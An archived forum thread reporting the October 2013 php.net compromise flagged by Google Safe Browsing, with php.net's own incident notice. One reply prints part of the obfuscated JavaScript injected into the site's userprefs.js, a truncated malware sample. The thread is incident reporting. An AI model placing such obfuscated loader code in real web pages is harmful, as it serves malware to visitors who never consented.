Google Chrome reports php.net has malware

Google Chrome is reporting that the official PHP site, php.net contains malware that can harm your computer. Google Chrome usually is correct about identifying infected websites or websites that may harm visitor's computers, but this time it's hard to believe. Typing php.net in Chrome flashes a warning message that says 'Malware Ahead! The website ahead contains malware! Google chrome has blocked access to php.net for now. Even if you have visited this website safely in the past, visiting it now is very likely to infect your Mac with malware." Out of curiosity, we clicked on 'Details about problem on this website' and found following information about what might be wrong with php.net -

malware

Of the 1613 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-10-24, and the last time suspicious content was found on this site was on 2013-10-23.
Malicious software includes 4 trojan(s). Malicious software is hosted on 4 domain(s), including cobbcountybankruptcylawyer.com/, stephaniemari.com/, northgadui.com/ . 3 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including stephaniemari.com/,northgadui.com/, satnavreviewed.co.uk/ .
PHP is one of the very popular web development languages, and one of the most frequently used resource by PHP developers. Millions of websites all over the world, including CrazyEngineers.com are powered by PHP. The warning message is being issued by all the leading popular browsers viz. Chrome, Mozilla Firefox and Apple's Safari.

We'll keep you posted about the developments on this front. It's not clear whether PHP.net has been deliberately attacked & hacked or Google's issuing a false alarm. If you have more information about the issue; please share it with us through comments.

Replies

  • Kaustubh Katdare
    Kaustubh Katdare
    A word about Google Safe Browsing: It's a service from Google that's used by all the leading web browsers including Safari, Chrome and Firefox. Google shares the information about the websites with Internet Service Providers (ISPs). For PHP.net, the site has not hosted malware for the past 90 days. It'd be interesting to see whether the hackers compromised pages on the site or is only linking to the websites that spread malware.

    Does anyone know more information about the issue?
  • Kaustubh Katdare
    Kaustubh Katdare
    Found some more information about the issue. Members on 'superuser' have been reporting that those malicious links were injected to the JavaScript that php.net uses. It looks like someone's injected obfuscated code to the userprefs.js on php.net -

    (function (MH) {
            var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b`\x04\x20-M@O\x00\x0d+\x0c\x0b\x04IM\x00d\x0fhbH"+
                    "mOO\x08J-\x0a.`iK\x00\x20(\x0b\x08)MM\x00d\x0bhKbmbb\x0bJ-\x09-`OhDf\x08)*B1*C0k\x0d,j2\x0c5+;|C\x19qSu\x1bgT`?\x0c\"1N'v\x0b-,H8"+
                    "ky6Er\x04!]\x19uVD.\x20\x15$qe\x20S>:sU\x1e:2#\x13MQ\x1c<\x20\x02)\x0eSTBlf\x05?62:`In\x17T&\x0c\"\x1e7Y\x01X@\x00/.q\x12\"\x08f#"+
                    "\x04k\x0a\x15`k.\x15rf\x0cbS\x20|x\x106CZ\x14\x18Xu1>:rXy\x0evb\x0d,q\x16\x06j\x025U\"cX\x15y|<2W~\x16\x032-T\x15\x17\\\\q\x01\x03"+
                    "\x09g\x00/.q\x12\"\x08f^\x1as$\x13f\x0e\x20i\x08Ur&H`\x1dd\x17Pt|{\x18Xu5@kn5\x14$*bx\"Yc-&}?~~2Afm\x0c\x11T\x04j`^5tRb\x0d]\x08\"]"+
                    "\x19uVD.\x20\x129wq9S\\\x1e:Qv`+lqVBhBv^?id\x20\x0dh\x11v\"*@\x1e:Rr1<\x00xx\x13&9`\x09,wPd\x0cfzWzA\x06\x1e\x1eBknW\x16B(\x06a\x00q\x02)"+
                    "\x7f*q\x19\x1f\x11v\"*@t9F`k.\x15rf\x0cb[6|\"g{S\x06m\x19\x0c6?9\x17\x14\x06j`8;\x10@Q\x1aBk\x0cUt`*\x06w4\x03\x0f~#f\x1e\x18rw\x20i\x08U"+
                    "r&H`|x\x15`!D\x18<\x11p^\x1apr<:r6\x1c\\2\x14\x1c\x18s\x18\"\x0b*Wr\"l\x02~dF\x16h<:s`\x1c\\7B\x1c\x18rC:u\x06\x1e:3s\x02A@\x1c\x18sC~T_\x20\x0dh\x11v\"*@!\x1eB\x1e:0px\\\x06i=nT=y6.\x14ht\x0ct.R\x1fy\x14\x19q_}"+
                    "\x0ct\x7fr=\x7fZ[@]2y\x19\x1fA\x1f2?\x1fj\x13\x19s_i\x0d[E\x1bS\x1f};V]0y\x1f&{p_?\x7f0;q\x1f9hP[\x15\x1d]jT[\x12[?^\x1f&{t_?\x19#;r\x1f"+
                    "_hW[\x14\x1dIk{ay5_ym\x1fA\x1f3?\x1f\x7f\x14\x19s_\x1bE[\x16\x1d=\x7fR[\x16[9P\x1fu}\x1fc9u\x1f=\x7f0Ypy;P\x1bQ\x1f{ay>_yy6{u_Y6\x19Q\x1f"+
                    "\x19c\x1b\x1d]y}\x12\x19\x12]\x19.*P\x1fp}yx9\x20\x19P\x1f\x1fY!\x7f5y\x1dH1{0\x7f/+\x7f>\x1fA\x1f4?\x1f\x19\x02\x19s_\x1d\x0cz\x7f!;t}]"+
                    "ydY\x16\x19\x19\x08m(\x16\x19v=\x19\x20Ysy]\x0d\x1dI\x19A[\x16[_\x0c0\x1f\x10\x19+9#\x19T\x1f\x1f*4\x7f2yi[?\x09;zo?\x0c\"1N'v\x0b-,H\x10"+
                    "\x0cui_gR&H\x10nw\x0b=fA(!T!\"\x12\x14\x0a[&'n%Pe\x04\x156$\x1bdGjgP!dx-9\x06'.\x056'\"'Rf\x1f$\x05.EtG&Zg\x7f9\x09\x7fk\x04j\x10.5\x19W"+
                    "\x16B(\x06v\x1dqq}s8^\\up\x02m_9\x17\x14\x06j`^8\x160Sq\x20+G$~~2\x15b\x01\x02m__\x7f\x176$j\x20qY=p<1f|x\x123\x20\x0dm?x-*0\x0c5I?'n3A"+
                    "{M&H\x10nwySTBlf\x1326\x03$\x13^\x1e:3txx\x15%)!fsNW$\x06m\x19\x09?P,5\x195\x14$*b\x17v\x10!\x06\x13\x1e\\Z76x
                                        
  • Ankita Katdare
    Ankita Katdare
    Looks like Php.net site owners have acknowledged the issue raised by Google Chrome. They have put up on their homepage a note about the corrective measures they are taking to resolove this. So, its now found to be true that JavaScript malware was served to a small percentage of php.net users from the 22nd to the 24th of October 2013.
    It is good to know that neither the source tarball downloads nor the Git repository were modified or compromised.

    NOTE: Two php.net servers were compromised, and have been removed from service. All services have been migrated to new, secure servers.

    SSL access to php.net Web sites is temporarily unavailable until a new SSL certificate is issued and installed on the servers that need it.
    Php.net users CAN EXPECT that their passwords will be reset.
    Note that users of PHP are unaffected by this: this is solely for people committing code to projects hosted on svn.php.net or git.php.net.

You are reading an archived discussion.

Related Posts

we all faces a problem like the invisible memory cards on mobile or pc. So try to short out this problem by the following steps: 1.first go to the the...
I am playing subway surfers in pc using mouse.but now how to assign controls in keyboard in subway surfers pc game?
Is there any gas which expands rapidly on adding other gas or chemical and can again be sapareted.?? Need help from chemical engineers.... ThankQ
Planning to start a new website? How about a break from traditional .com, .net and .org? Very soon, you will be able to have a website address like GuptaTuitionClasses.website! India's...